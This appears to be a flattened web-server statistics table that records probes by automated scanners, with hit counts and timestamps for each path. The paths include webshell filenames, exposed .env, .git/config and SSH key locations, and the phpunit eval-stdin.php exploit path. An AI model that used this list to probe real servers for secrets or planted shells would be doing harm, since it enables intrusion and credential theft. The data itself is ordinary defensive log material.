1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config.ini 1 0 0 0 7 0 0 29415130 0 0 29211744 0 /wp-admin/user/about.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /whv.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /cong.php?p= 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /update.php 1 0 0 0 4 0 0 29365498 0 0 29291986 0 /manager.php 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /files/.git/config 1 0 0 0 3 0 0 29274239 0 0 28968419 0 /wordpress/ 1 0 0 0 2 0 0 29274239 0 0 29270173 0 /wp/ 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 7769 /akcc.php?copy=.well-known&p= 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wp-swa.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app.yaml 1 0 0 0 1 0 0 29187201 0 0 29187201 0 /wp-admin/ALFA_DATA/alfacgiapi/ 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /modules/mod_simplefileuploadv1.3/elements/wpxadmin.php 1 0 0 0 5 0 0 29384959 0 0 29278576 0 /shell.php 1 1 0 0 0 28598314 0 0 28598314 0 0 64 /.well-known/acme-challenge/-HENXRZ38FCSWEHRHRFS9BY412TJFP1J 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /backdoor_access.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /rafu.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /re.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/info 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /saas/.env 1 0 0 0 3 0 0 29415130 0 0 29365498 0 /item.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /configuration.php.bak 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /suc.php 1 0 0 0 4 0 0 29389153 0 0 29125507 0 /@vite/env 1 0 0 0 22 0 0 29415130 0 0 29282380 0 /lock360.php 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /wp-admin/maint/iR7SzrsOUEP.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /flex.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /private/info.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /dr.php 1 0 0 0 2 0 0 29384960 0 0 29278576 0 /mini.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /uwu2.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /ixj.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /t.php?p= 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /gaga.php 1 0 0 0 23 0 0 29393907 0 0 28867962 0 /2019/wp-includes/wlwmanifest.xml 1 0 0 0 8 0 0 29393907 0 0 28867962 0 /2020/wp-includes/wlwmanifest.xml 1 0 0 0 11 0 0 29388632 0 0 29291986 0 /efile.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /index/fucku.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /wp-admin/js/wp-conflg.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /_vti_pvt/authors.pwd 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /hb02ugyh.php 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /web 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /kill-9-1.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /oswkk.php 1 0 0 0 1 0 0 29210009 0 0 29210009 0 /wp-content/plugins/wp-help/admin/wp-fclass.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /blurbs8.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /jspshell.jsp 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /bala.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /wp-content/uploads/xl2023.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /foot.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /marijuana.php? 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /luxe.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /Cok.php 1 0 0 0 7 0 0 29415130 0 0 29211743 0 /simple.php 1 0 0 0 4 0 0 29388632 0 0 29306748 0 /nc4.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /wp-mt.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /error1.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /wp-content/uploads/wp-login.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /api/v3/.git/config 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /asserter.php 1 0 0 0 1 0 0 28697877 0 0 28697877 0 /.env?199.45.154.72 1 0 0 0 12 0 0 29415130 0 0 29326315 0 /alfa.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /lts.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /ccou.php 1 0 0 0 1 0 0 29128604 0 0 29128604 0 /docs/.git/config?192.42.116.194 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /moie.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-content/install.php 1 0 0 0 3 0 0 29327095 0 0 29294468 0 /law.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /sneaky_shell.php 1 0 0 0 2 0 0 29416373 0 0 29388817 0 /debug.log 1 0 0 0 4 0 0 29388631 0 0 29326315 0 /nij.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-includes/Text/about.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /fs7.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /fdd2.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /link.php 1 0 0 0 5 0 0 29372859 0 0 29294468 0 /jlex3.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /config.php? 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /admin-heade.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /pm.php 1 0 0 0 20 0 0 29393906 0 0 28968133 0 /wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /content.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /tajj.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /mws.php 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /wp-admin/includes/iR7SzrsOUEP.php 1 0 0 0 5 0 0 29359668 0 0 29325293 0 /d2.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp-good.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /list.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /aipoyp.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /men.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /infos.php 1 0 0 0 10 0 0 29416373 0 0 28605909 0 /_profiler/phpinfo 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /src/config.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /pola.php 1 4 0 0 0 29301183 0 0 29301183 0 0 348 /.well-known/acme-challenge/U2sg2GhcGjjhxCbnrBbansvurtg_jJBK_SF3wr2sb5M 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/common/footer.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.production.local 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /class17.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /fm2.php 1 0 0 0 1 0 0 28620679 0 0 28620679 0 /storage/.env 1 0 0 0 1 0 0 29187232 0 0 29187232 0 /assets/upload/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/extension/total.php 1 0 0 0 1 0 0 29313921 0 0 29313921 0 /Backup 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /sex.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /kki.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /siln.php 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /.env.js 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /wp-xx.php 1 0 0 0 14 0 0 29389153 0 0 28598316 0 /.DS_Store 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/services.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /%c0/ 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /user_secrets.yml 1 0 0 0 6 0 0 29388631 0 0 29291986 0 /v2.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /g7y.php 1 0 0 0 4 0 0 29388632 0 0 29306748 0 /slo.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/js/crop/zmFM.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /noe.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 6 0 0 29415130 0 0 29278576 0 /404.php 1 0 0 0 4 0 0 29362131 0 0 29294468 0 /iov.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /delpaths.php 1 83 83 0 8 29286014 0 29144652 29021322 0 29049210 56341 /?192.42.116.194 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /1index.php 1 0 0 0 1 0 0 29187220 0 0 29187220 0 /wp-admin/alfacgiapi/ 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /media../.git/config 1 0 0 0 4 0 0 29388632 0 0 29306748 0 /great.php 1 0 0 0 11 0 0 29415130 0 0 29210038 0 /x.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /blok.php 1 0 0 0 4 0 0 29388632 0 0 29348987 0 /tinyfilemanager.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/extension/module.php 1 0 0 0 2 0 0 29368602 0 0 29367838 0 /xcre1.php 1 0 0 0 1 0 0 29285613 0 0 29285613 0 /wordpress/?192.42.116.194 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /private/config.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /includes/.git/config 1 0 0 0 1 0 0 29313965 0 0 29313965 0 /Blog 1 0 0 0 1 0 0 29020685 0 0 29020685 0 /appsettings.json?45.148.10.172 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /wrt.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /stealth_shell.php 1 0 0 0 6 0 0 29388632 0 0 29277539 0 /ol.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /20.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /gelap.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /tmpls.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /makeasmtp.php?p= 1 0 0 0 1 0 0 28940400 0 0 28940400 0 /public/vendor/laravel-filemanager/js/script.js 1 0 0 0 4 0 0 29362131 0 0 29277539 0 /123.php 1 0 0 0 4 0 0 29278576 0 0 29211744 0 /chosen.php?p= 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /tund.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /raw.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /snus.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /asas.php 1 0 0 0 9 0 0 29415130 0 0 29354064 0 /0x.php 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /old/.git/config 1 0 0 0 2 0 0 29250913 0 0 29250911 0 /akcc.php?p=&upload= 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/common/login.php 1 0 0 0 2 0 0 29326315 0 0 29299891 0 /bp.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /cord.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/sendgrid.json 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/radio.php 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /dashboard/info.php 1 0 0 0 10 0 0 29388632 0 0 29278577 0 /s.php 1 0 0 0 6 0 0 29415130 0 0 29277539 0 /zwso.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /.well-known/pki-validation/wp-login.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /habhan.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /data/.git/config 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /ioxi002.PhP7 1 0 0 0 1 0 0 29187209 0 0 29187209 0 /.well-known/ALFA_DATA/alfacgiapi/ 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /wp-includes/fonts/about.php 1 0 0 0 5 0 0 29415130 0 0 29325293 0 /wp-admin/css/wp-conflg.php?p= 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /cbrfo.php 1 1 0 0 0 29389149 0 0 29389149 0 0 64 /.well-known/acme-challenge/YWFVLV_H79HFBJOPWAIVA_PAD0PL2EDP 1 0 0 0 7 0 0 29415130 0 0 29354064 0 /bless11.php 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /assets/.git/config 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /h8h9.php 1 0 0 0 4 0 0 29145055 0 0 28867962 0 /2021/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29361379 0 0 29361369 0 /admin-header.php 1 0 0 0 2 0 0 29278577 0 0 29278577 0 /wp-admin/admin-ajax.php 1 0 0 0 3 0 0 29416373 0 0 29248560 0 /.env.production 1 0 0 0 1 0 0 29387122 0 0 29387122 0 /xvent.php 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /tmp 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /samll.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /wp-includes/ID3/rk2.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /jquery.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /xsas.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /x23.php 1 0 0 0 1 0 0 29228723 0 0 29228723 0 /doiconvs.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /sder52u.php 1 0 0 0 3 0 0 29416373 0 0 29248560 0 /.env.development 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /tools/.env 1 0 0 0 9 0 0 29384960 0 0 29291986 0 /fe5.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/index.php 1 0 0 0 5 0 0 29415130 0 0 29367838 0 /readme.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /encrypted_shell.php 1 0 0 0 2 0 0 29278576 0 0 29211745 0 /wp-admin/maint/atomlib.php 1 0 0 0 1 0 0 29187237 0 0 29187237 0 /wp/ALFA_DATA/alfacgiapi/ 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /nqsa.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /zp.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /config.yaml 1 0 0 0 5 0 0 29388632 0 0 29282380 0 /axx.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 4 0 0 29415130 0 0 29325294 0 /manager.php?p= 1 0 0 0 4 0 0 29362131 0 0 29278577 0 /n.php 1 0 0 0 3 0 0 29415130 0 0 29211762 0 /wp-admin/css/colors/blue/index.php 1 0 0 0 1 0 0 29210011 0 0 29210011 0 /wp-admin/user/users.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /gt.php 1 0 0 0 4 0 0 29372859 0 0 29326315 0 /hk.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /wp-admin/network/iR7SzrsOUEP.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /credentials.json 1 0 0 0 18 0 0 29388632 0 0 29291986 0 /ffile.php 1 1 0 0 0 29213343 0 0 29213343 0 0 64 /.well-known/acme-challenge/FC67N-Z4KOAFM6QLMINH9HNDU3MANBWN?192.42.116.194 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /wso2.php 1 0 0 0 2 0 0 29365498 0 0 29210038 0 /xl2023.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /syl1yt.php 1 0 0 0 3 0 0 29415130 0 0 29359668 0 /wp-includes/js/codemirror/index.php 1 0 0 0 1 0 0 29100022 0 0 29100022 0 /index.php?params=1 1 0 0 0 12 0 0 29415130 0 0 29299891 0 /file9.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /st.php 1 0 0 0 1 0 0 28861803 0 0 28861803 0 /_all_dbs?45.148.10.172 1 0 0 0 9 0 0 29388631 0 0 29299891 0 /3.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /en0.php 1 0 0 0 1 0 0 29354065 0 0 29354065 0 /MF.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /vansec.php 1 0 0 0 1 0 0 29313951 0 0 29313951 0 /Site 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /xmlrpc.php 1 0 0 0 8 0 0 29388632 0 0 29306748 0 /makeasmtp.php 1 0 0 0 7 0 0 29365390 0 0 29032976 0 /i.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /zxin.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /stealth_access.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /xzs.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/setting/language.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /wp-admin/js/widgets/iR7SzrsOUEP.php 1 0 0 0 5 0 0 29388632 0 0 29294468 0 /aa17.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /1.php? 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /fix.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /lx.php 1 0 0 0 5 0 0 29388631 0 0 29294468 0 /mo.php 1 0 0 0 2 0 0 29368602 0 0 29367838 0 /jatuh.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /uplozyu.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /lhh2.php 1 0 0 0 1 0 0 29187222 0 0 29187222 0 /wp-admin/css/about.php/alfacgiapi/ 1 0 0 0 2 0 0 29250913 0 0 29250911 0 /akcc.php?dl=.htaccess&p= 1 0 0 0 2 0 0 29355640 0 0 29348987 0 /tinyfilemanager/tinyfilemanager.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.prod 1 0 0 0 10 0 0 29388027 0 0 29299891 0 /file4.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /rx.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /bin.php 1 0 0 0 15 0 0 29388027 0 0 29299891 0 /filesss.php 1 0 0 0 3 0 0 29325243 0 0 29248560 0 /v1/.env 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-admin/maint/admin.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /redi.php 1 0 0 0 7 0 0 29388027 0 0 29354064 0 /aj.php 1 0 0 0 26 0 0 29415130 0 0 29277539 0 /gmo.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /lock1.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /swagger-ui.html 1 0 0 0 7 0 0 29415130 0 0 29326315 0 /xx.php 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /file52.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /system.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /d.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /remote_control.php 1 0 0 0 12 0 0 29389153 0 0 28598316 0 /_all_dbs 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /ha.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /fs.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /server/.env 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /azra.php 1 0 0 0 4 0 0 29415130 0 0 29326315 0 /wp-admin/maint/maint.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /777.php 1 0 0 0 8 0 0 29372859 0 0 29299891 0 /031.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /.kube/config 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /tentang_rmol.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /ww3.php 1 0 0 0 233 0 0 29407122 0 0 28598316 0 /favicon.ico 1 0 0 0 2 0 0 28989273 0 0 28984122 0 /jquery.filer/php/readme.txt?104.166.80.124 1 0 0 0 2 0 0 29248560 0 0 28777719 0 /info 1 0 0 0 26 0 0 29393906 0 0 28867962 0 /xmlrpc.php?rsd 1 0 0 0 16 0 0 29415130 0 0 29355662 0 /goods.php 1 0 0 0 7 0 0 29416373 0 0 29187270 0 /api/.env 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /config/phpinfo.php 1 0 0 0 13 0 0 29373626 0 0 29277539 0 /chosen.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /gfs.php 1 0 0 0 1 0 0 29187249 0 0 29187249 0 /cgi-bin/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /qil.php 1 0 0 0 3 0 0 29384959 0 0 29299891 0 /eauu.php 1 0 0 0 1 0 0 28974060 0 0 28974060 0 /phpinfo?104.166.80.124 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /loli.php 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /ea3f.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /ae.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /database/.git/config 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-content/themes/yourtheme/functions.php 1 1 0 0 0 28773962 0 0 28773962 0 0 64 /.well-known/acme-challenge/KUC0VOKW9IYLY1A7XKLHKNBS9W9UQ_H-?198.235.24.138 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /graphql/api 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /phpinfo.phtml 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /er8.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /hidden_shell.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /secrets.json 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /42u.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /api/.git/config 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /.ssh/id_rsa 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /webshell.php 1 0 0 0 2 0 0 29278576 0 0 29211744 0 /wp-admin/network/admin.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /api137.php 1 0 0 0 3 0 0 29365498 0 0 29325294 0 /goat1.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /zasd.php 1 4 0 0 0 29037485 0 0 29037485 0 0 348 /.well-known/acme-challenge/bSku-IgzVt16JJuikoqsZPm-Gu6piicGlJEiXtc7phg 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /errorfile.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /oxvrws.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-includes/style-engine/about.php 1 0 0 0 12 0 0 29415130 0 0 29354064 0 /gifclass4.php 1 0 0 0 3 0 0 29415130 0 0 29325294 0 /file.php? 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.dev 1 0 0 0 1 0 0 28777719 0 0 28777719 0 /_profiler/phpinfo.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /enkkk.php 1 0 0 0 3 0 0 29325243 0 0 28620679 0 /assets/.env 1 0 0 0 17 0 0 29388632 0 0 29299891 0 /wp-content/plugins/hellopress/wp_filemanager.php 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /wp-admin/images/iR7SzrsOUEP.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-admin/js/about.php 1 0 0 0 2 0 0 29250913 0 0 29250912 0 /akcc.php?p=&quickView=1&view=akcc.php 1 0 0 0 2 0 0 29384959 0 0 29277539 0 /ww.php 1 0 0 0 1 0 0 29313932 0 0 29313932 0 /Shop 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /2eaa2.php 1 0 0 0 2 0 0 28989273 0 0 28984122 0 /assets/admin/bower_components/jquery.filer/php/readme.txt 1 0 0 0 5 0 0 29388632 0 0 29291986 0 /w3llstore.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /admin-app/.env 1 0 0 0 5 0 0 29388027 0 0 29367838 0 /wp-aaa.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /bb2.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /class-.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /bi1f.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /ncx.php 1 0 0 0 2 0 0 29250912 0 0 29250911 0 /akcc.php?copy=.htaccess&p= 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /application/.env 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /shelp.php 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /taff.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /t3x.php 1 0 0 0 12 0 0 29403111 0 0 28886193 0 /wp-login.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /cloud-config.yml 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /x3.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /old-cuburn/.git/config 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /api/admin/v2/.git/config 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/env.json 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.docker 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-head.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /nox.php 1 0 0 0 3 0 0 29001245 0 0 28811874 0 /.git/config?45.148.10.172 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/setting/localisation.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /alf4.php 1 0 0 0 1 0 0 29313906 0 0 29313906 0 /Www 1 0 0 0 2 0 0 29278578 0 0 29278578 0 /admin/controller/setting/backup.php 1 0 0 0 1 0 0 29312102 0 0 29312102 0 /.git/config?147.93.158.41 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /wp-content/plugins/TOPXOH/wDR.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /aucxcocoxo.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /Booking/Default.aspx 1 0 0 0 1 0 0 29396615 0 0 29396615 0 /.git/config?109.196.75.89 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /.env.test 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /tx1.php 1 0 0 0 1 0 0 29326315 0 0 29326315 0 /wpc.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /output.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /api/src/.env 1 0 0 0 7 0 0 29388632 0 0 29291986 0 /yasnu.php 1 0 0 0 4 0 0 29372859 0 0 29365498 0 /555.php 1 0 0 0 3 0 0 29388632 0 0 29306748 0 /akc.php 1 0 0 0 9 0 0 29388631 0 0 29299891 0 /gfile.php 1 0 0 0 3 0 0 29388632 0 0 29306748 0 /public/wsr2.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /alma.php 1 0 0 0 6 0 0 29157451 0 0 29060915 0 /.git/config?192.42.116.194 1 0 0 0 17 0 0 29415130 0 0 29211741 0 /admin.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /moon.php 1 0 0 0 6 0 0 29006098 0 0 28779005 0 /favicon.ico?45.148.10.172 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /wp-admin/wp-login.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /144.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /x50.php 1 0 0 0 4 0 0 29359628 0 0 29299065 0 /favicon.ico?147.93.158.41 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /file30.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /server/phpinfo.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /past1.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /css/colors/coffee/index.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-includes/customize/about.php 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=akcc.php&finish=1&move=1&p= 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /xxl.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /zeu.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /hello.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /acp.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /docker-compose.override.yml 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /rules.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /application.properties 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /gool.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /psnlink/.env 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /admin/config.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 